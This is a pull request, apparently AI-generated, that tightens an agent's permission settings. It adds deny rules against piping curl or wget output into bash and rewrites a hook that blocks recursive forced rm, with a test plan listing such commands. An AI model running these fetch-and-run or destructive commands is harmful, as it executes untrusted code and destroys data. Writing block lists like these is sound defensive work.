### PR TITLE
Harden rm hook regex and add pipe-to-shell deny rules

### DIFF
--- a/settings.json
+++ b/settings.json
@@ -17,7 +17,10 @@
       "Bash(mkfs *)",
       "Bash(dd *)",
       "Bash(curl *|bash*)",
+      "Bash(curl *| bash*)",
       "Bash(wget *|bash*)",
+      "Bash(wget *| bash*)",
+      "Bash(bash <(curl *))",
       "Bash(git push --force*)",
       "Bash(git push *--force*)",
       "Bash(git reset --hard*)",
@@ -53,7 +56,7 @@
         "hooks": [
           {
             "type": "command",
-            "command": "CMD=$(jq -r '.tool_input.command'); if echo \"$CMD\" | grep -qE 'rm[[:space:]]+-[^[:space:]]*r[^[:space:]]*f'; then echo 'BLOCKED: Use trash instead of rm -rf' >&2; exit 2; fi"
+            "command": "CMD=$(jq -r '.tool_input.command'); if echo \"$CMD\" | grep -qiE '(^|;[[:space:]]*|&&[[:space:]]*|[|][|][[:space:]]*|[|][[:space:]]*)rm[[:space:]]' && echo \"$CMD\" | grep -qiE '(^|[[:space:]])-[a-zA-Z]*[rR]|--recursive' && echo \"$CMD\" | grep -qiE '(^|[[:space:]])-[a-zA-Z]*[fF]|--force'; then echo 'BLOCKED: Use trash instead of rm -rf' >&2; exit 2; fi"
           },
           {
             "type": "command",


### PR DESCRIPTION
## Summary

Simplified take on #33 — keeps the meaningful security improvements, drops the combinatorial bloat.

- **Rewrite rm hook regex**: Replace single lowercase-only pattern with three chained case-insensitive grep checks (rm command → recursive flag → force flag). Handles commands chained with `;`, `&&`, `||`, `|`.
- **Add deny rules**: `bash <(curl *)` for process substitution, spaced pipe variants (`curl *| bash*`, `wget *| bash*`).

### What was dropped from #33

- **16 case/ordering permutations of rm flags** in deny rules — the rewritten hook catches all of these already, so enumerating `-Rf`, `-rF`, `-RF`, `-fR`, `-Fr`, `-FR`, separated flags, and long-form `--recursive --force` in deny rules is redundant.
- **`* | sh` and `* | zsh` deny rules** — too broad, would block legitimate pipes to sh/zsh.
- **Case-insensitive flag on git push hook** — `git` is always lowercase, no need.

## Test plan

- [ ] Verify `rm -rf /tmp/test` is blocked by hook
- [ ] Verify `rm -Rf /tmp/test` is blocked by hook (case variant)
- [ ] Verify `rm --recursive --force /tmp/test` is blocked by hook (long flags)
- [ ] Verify `rm -r /tmp/test` is allowed (no force flag)
- [ ] Verify `rm file.txt` is allowed (no recursive or force)
- [ ] Verify `bash <(curl http://example.com)` is blocked by deny rule
- [ ] Verify `curl http://example.com | bash` and `curl http://example.com| bash` both blocked

Supersedes #33.

🤖 Generated with [Claude Code](https://claude.com/claude-code)